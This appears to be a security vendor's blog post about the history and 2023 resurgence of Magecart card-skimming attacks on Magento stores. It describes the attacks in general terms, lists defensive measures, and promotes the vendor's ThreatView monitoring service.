top of page

Magecart - The Resurgence of Magecart Attacks

Benjamin Hosack

Magecart attacks, named for their initial focus on Magento-based ecommerce platforms, first surged in 2015, marking one of the largest campaigns in eCommerce attack history. Exploiting vulnerabilities within Magento, notably the Shoplift/SUPEE 5344, attackers infiltrated thousands of websites.


In a basic Magecart attack, malicious code was injected into a site's JavaScript source code, acting as a skimmer to pilfer cardholder data and personal information during checkout. This data was then encoded/encrypted and exfiltrated to remote systems controlled by the attackers.


Magecart malware detection

Between 2015 and 2022, the prevalence of Magecart attacks skyrocketed, with our partner, Foregenix, at the forefront of incident response and investigation, aiding medium to large-scale enterprises in containing and eradicating breaches swiftly.


In 2023, a resurgence of Magecart attacks is observed, marked by more sophisticated evasion tactics (read about "Stealthy Malware").


Recent investigations reveal attackers initiating breaches by compromising internet-connected computers to serve as command and control (C2) servers for hosting malicious code. Exploiting vulnerabilities like CVE-2022-24086/7 on unpatched Magento sites, attackers inject malicious JavaScript code, often masquerading as illegitimate Google Tag Manager (GTM) scripts. This facilitates the loading of malware, such as fake payment pages, from compromised legitimate sites acting as C2 servers, enabling the harvesting and exfiltration of cardholder data.


Combining traditional Magecart techniques with modern methods enhances evasion and effectiveness, with the illegitimate GTM code appearing legitimate to unsuspecting IT personnel.


Preventing these attacks requires proactive measures:

  • Regularly update and patch software to mitigate known vulnerabilities, reducing the attack surface.

  • Conduct regular security audits to monitor JavaScript integrity and detect any unauthorized alterations or injections.

  • Implement File Integrity Monitoring (FIM) to promptly detect and respond to unauthorized file modifications.

  • Enforce regular password reviews and rotations, ideally every ninety days.

  • Implement HTTP Content Security Policy Headers to bolster defense against code injection attacks like clickjacking and XSS.


ThreatView Advanced provides eCommerce sites with the capability of detecting and alerting to attacks in real-time, backed by one of the industry's most experienced team of eCommerce Incident Response specialists, ensuring swift response and containment with minimal disruption to business operations and revenue generation.


Explore our website security solutions with ThreatView for free to safeguard your website effectively.



12 views0 comments

Recent Posts

See All

Security Advisory November 2024

Our partner, Foregenix , is one of the leading forensic investigation teams in the industry and are regularly identifying new threats,...

Comments


bottom of page